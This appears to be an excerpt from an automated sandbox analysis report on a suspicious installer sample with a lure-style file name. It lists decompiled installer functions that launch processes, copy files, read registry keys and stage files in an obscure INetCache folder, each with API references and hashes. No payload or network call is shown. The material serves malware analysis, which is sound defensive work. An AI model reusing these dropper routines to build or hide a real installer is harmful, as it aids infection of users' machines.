                                                                                                                                                                                  0x004015f3
                                                                                                                                                                                  0x004015f4
                                                                                                                                                                                  0x004015dd
                                                                                                                                                                                  0x004015dd
                                                                                                                                                                                  0x004015e0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004015eb
                                                                                                                                                                                  0x004015ec
                                                                                                                                                                                  0x004015ec
                                                                                                                                                                                  0x004015e0
                                                                                                                                                                                  0x004015fb
                                                                                                                                                                                  0x00401602
                                                                                                                                                                                  0x0040160f
                                                                                                                                                                                  0x0040160f
                                                                                                                                                                                  0x00401604
                                                                                                                                                                                  0x00401605
                                                                                                                                                                                  0x0040160d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x0040160d
                                                                                                                                                                                  0x00401602
                                                                                                                                                                                  0x00401612
                                                                                                                                                                                  0x00401615
                                                                                                                                                                                  0x00401617
                                                                                                                                                                                  0x00401618
                                                                                                                                                                                  0x004015c8
                                                                                                                                                                                  0x0040161f
                                                                                                                                                                                  0x0040164a
                                                                                                                                                                                  0x004021c4
                                                                                                                                                                                  0x00401621
                                                                                                                                                                                  0x00401623
                                                                                                                                                                                  0x0040162e
                                                                                                                                                                                  0x00401634
                                                                                                                                                                                  0x0040163c
                                                                                                                                                                                  0x00401642
                                                                                                                                                                                  0x00401642
                                                                                                                                                                                  0x0040163c
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,762C3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,762C3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                                                                                                                    • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                                                                                                                    • Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                                                                                                  • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc\Antioxidanttilskud\Pellicularia\Unillusioned,00000000,00000000,000000F0), ref: 00401634
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc\Antioxidanttilskud\Pellicularia\Unillusioned, xrefs: 00401629
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\sjoske\Humlebier\aesc\Antioxidanttilskud\Pellicularia\Unillusioned
                                                                                                                                                                                  • API String ID: 1892508949-488347389
                                                                                                                                                                                  • Opcode ID: deac6dc071e9533c58350b4708d0caef2e548cc73378f66c521ca59dd2e6ec16
                                                                                                                                                                                  • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                                                                                                                                                  • Opcode Fuzzy Hash: deac6dc071e9533c58350b4708d0caef2e548cc73378f66c521ca59dd2e6ec16
                                                                                                                                                                                  • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004054C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E004054C0(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42b070->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42b070,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                                                                                  0x004054c9
                                                                                                                                                                                  0x004054e9
                                                                                                                                                                                  0x004054f1
                                                                                                                                                                                  0x004054f6
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004054fc
                                                                                                                                                                                  0x00405500

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Error launching installer, xrefs: 004054D3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseCreateHandleProcess
                                                                                                                                                                                  • String ID: Error launching installer
                                                                                                                                                                                  • API String ID: 3712363035-66219284
                                                                                                                                                                                  • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                                                                                                                  • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                                                                                                                                                  • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                                                                                                                  • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 004021D2 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                  			E004021D2() {
				char _t32;
				CHAR* _t35;
				CHAR* _t37;
				void* _t39;

				_t37 = E00402A3A(_t32);
				_t35 = E00402A3A(0x11);
				 *((intOrPtr*)(_t39 + 8)) = E00402A3A(0x23);
				if(E00406033(_t37) != 0) {
					 *(_t39 - 0x64) =  *(_t39 - 8);
					 *((intOrPtr*)(_t39 - 0x60)) = 2;
					( &(_t37[1]))[lstrlenA(_t37)] = _t32;
					( &(_t35[1]))[lstrlenA(_t35)] = _t32;
					_t25 =  *((intOrPtr*)(_t39 + 8));
					 *(_t39 - 0x5c) = _t37;
					 *(_t39 - 0x58) = _t35;
					 *((intOrPtr*)(_t39 - 0x4a)) =  *((intOrPtr*)(_t39 + 8));
					 *((short*)(_t39 - 0x54)) =  *((intOrPtr*)(_t39 - 0x20));
					E00404F48(_t32, _t25);
					if(SHFileOperationA(_t39 - 0x64) != 0) {
						goto L1;
					}
				} else {
					L1:
					E00404F48(0xfffffff9, _t32); // executed
					 *((intOrPtr*)(_t39 - 4)) = 1;
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t39 - 4));
				return 0;
			}







                                                                                                                                                                                  0x004021da
                                                                                                                                                                                  0x004021e3
                                                                                                                                                                                  0x004021eb
                                                                                                                                                                                  0x004021f5
                                                                                                                                                                                  0x00402208
                                                                                                                                                                                  0x0040220b
                                                                                                                                                                                  0x00402218
                                                                                                                                                                                  0x00402221
                                                                                                                                                                                  0x00402225
                                                                                                                                                                                  0x0040222e
                                                                                                                                                                                  0x00402231
                                                                                                                                                                                  0x00402234
                                                                                                                                                                                  0x00402237
                                                                                                                                                                                  0x0040223b
                                                                                                                                                                                  0x0040224c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00402252
                                                                                                                                                                                  0x004021f7
                                                                                                                                                                                  0x004021f7
                                                                                                                                                                                  0x004021fa
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406033: FindFirstFileA.KERNELBASE(762C3410,0042B0B8,0042AC70,004058D2,0042AC70,0042AC70,00000000,0042AC70,0042AC70,762C3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,762C3410,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                                                                                                                                    • Part of subcall function 00406033: FindClose.KERNEL32(00000000), ref: 0040604A
                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 00402212
                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040221C
                                                                                                                                                                                  • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402244
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1486964399-0
                                                                                                                                                                                  • Opcode ID: ed750e34a958be4b73924ed571cdc7d99039851bfea119ae3adcd23e204a2496
                                                                                                                                                                                  • Instruction ID: 1827a988af6f451ff71b2086c52b677c379bcd0e44b3ee174db1e06b402c0886
                                                                                                                                                                                  • Opcode Fuzzy Hash: ed750e34a958be4b73924ed571cdc7d99039851bfea119ae3adcd23e204a2496
                                                                                                                                                                                  • Instruction Fuzzy Hash: AB117071904354ABDB10EFB98949A8EB7F8AF14348F10843BA101FB2C2DAB8C5018B29
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                  			E00401E44() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A3A(_t24);
				E00404F48(0xffffffeb, _t13); // executed
				_t15 = E004054C0(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E00406104(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc);
						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
							if( *(_t31 - 0xc) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405C8D(_t26,  *(_t31 - 0xc));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}







                                                                                                                                                                                  0x00401e4a
                                                                                                                                                                                  0x00401e4f
                                                                                                                                                                                  0x00401e55
                                                                                                                                                                                  0x00401e5c
                                                                                                                                                                                  0x00401e5f
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x00401e65
                                                                                                                                                                                  0x00401e68
                                                                                                                                                                                  0x00401e79
                                                                                                                                                                                  0x00401e74
                                                                                                                                                                                  0x00401e74
                                                                                                                                                                                  0x00401e8e
                                                                                                                                                                                  0x00401e97
                                                                                                                                                                                  0x00401ea7
                                                                                                                                                                                  0x00401ea9
                                                                                                                                                                                  0x00401ea9
                                                                                                                                                                                  0x00401e99
                                                                                                                                                                                  0x00401e9d
                                                                                                                                                                                  0x00401e9d
                                                                                                                                                                                  0x00401e97
                                                                                                                                                                                  0x00401eb0
                                                                                                                                                                                  0x00401eb3
                                                                                                                                                                                  0x00401eb3
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,0041B020,762C23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                                                                                                                    • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,0041B020,762C23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                                                                                                                    • Part of subcall function 00404F48: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00402FFA,00402FFA,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,00000000,0041B020,762C23A0), ref: 00404FA4
                                                                                                                                                                                    • Part of subcall function 00404F48: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsq51C5.tmp\System.dll), ref: 00404FB6
                                                                                                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                                                                                                                    • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                                                                                                                    • Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                                                                                                                    • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3521207402-0
                                                                                                                                                                                  • Opcode ID: 89dd341359d6249cec0893c15adba14311a560d9a510c0dd371a189cc83d464b
                                                                                                                                                                                  • Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
                                                                                                                                                                                  • Opcode Fuzzy Hash: 89dd341359d6249cec0893c15adba14311a560d9a510c0dd371a189cc83d464b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00405C16 Relevance: 4.5, APIs: 3, Instructions: 45registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                                  			E00405C16(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
				long _t20;
				long _t23;
				long _t24;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				if(_t20 == 0) {
					_a8 = 0x400;
					_t23 = RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x3ff] = 0;
					_t24 = RegCloseKey(_a20); // executed
					return _t24;
				}
				return _t20;
			}







                                                                                                                                                                                  0x00405c26
                                                                                                                                                                                  0x00405c28
                                                                                                                                                                                  0x00405c35
                                                                                                                                                                                  0x00405c3f
                                                                                                                                                                                  0x00405c47
                                                                                                                                                                                  0x00405c4c
                                                                                                                                                                                  0x00405c60
                                                                                                                                                                                  0x00405c68
                                                                                                                                                                                  0x00405c76
                                                                                                                                                                                  0x00405c76
                                                                                                                                                                                  0x00405c7b
                                                                                                                                                                                  0x00405c81
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00405c81
                                                                                                                                                                                  0x00405c8a

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,00405E5B,00000000,00000002,?,00000002,?,?,00405E5B,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405C3F
                                                                                                                                                                                  • RegQueryValueExA.KERNELBASE(?,?,00000000,00405E5B,?,00405E5B), ref: 00405C60
                                                                                                                                                                                  • RegCloseKey.KERNELBASE(?), ref: 00405C81
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499653111.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11499692800.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000486000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.11500049722.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3677997916-0
                                                                                                                                                                                  • Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                                                                                                                  • Instruction ID: 20ca943cec1bfd02e9a7b8a7961d2af95be0026f17772609ad776ff58b8bf793
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1601487254420EEFEB128F64EC48EEB3FACEF15394B004126FA04A6220D235D964CBA5
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                                  			E00402482(int* __ebx, char* __esi) {
				int _t8;
				long _t11;
				int* _t14;
				void* _t18;
				char* _t20;
				void* _t22;
				void* _t25;

				_t20 = __esi;
				_t14 = __ebx;
				_t18 = E00402B44(_t25, 0x20019);
				_t8 = E00402A1D(3);
				 *__esi = __ebx;
				if(_t18 == __ebx) {
					L7:
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					 *(_t22 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t22 - 0x18)) == __ebx) {
						_t11 = RegEnumValueA(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t11;
						if(_t11 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyA(_t18, _t8, __esi, 0x3ff);
						L4:
						_t20[0x3ff] = _t14;
						_push(_t18); // executed
						RegCloseKey(); // executed
					}
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}










                                                                                                                                                                                  0x00402482
                                                                                                                                                                                  0x00402482
                                                                                                                                                                                  0x0040248e
                                                                                                                                                                                  0x00402490
                                                                                                                                                                                  0x00402497
                                                                                                                                                                                  0x00402499
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x004026a6
                                                                                                                                                                                  0x0040249f
                                                                                                                                                                                  0x004024a7
                                                                                                                                                                                  0x004024aa
                                                                                                                                                                                  0x004024c3
                                                                                                                                                                                  0x004024c9
                                                                                                                                                                                  0x004024cb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x004024ac
                                                                                                                                                                                  0x004024b0
                                                                                                                                                                                  0x004024d1
                                                                                                                                                                                  0x004024d1
                                                                                                                                                                                  0x004024d7
                                                                                                                                                                                  0x004024d8
                                                                                                                                                                                  0x004024d8
                                                                                                                                                                                  0x004024aa
                                                                                                                                                                                  0x004028d2
                                                                                                                                                                                  0x004028de

                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,00000135,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                                                                                                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
                                                                                                                                                                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
                                                                                                                                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsq51C5.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.11499590101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.11499558014.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
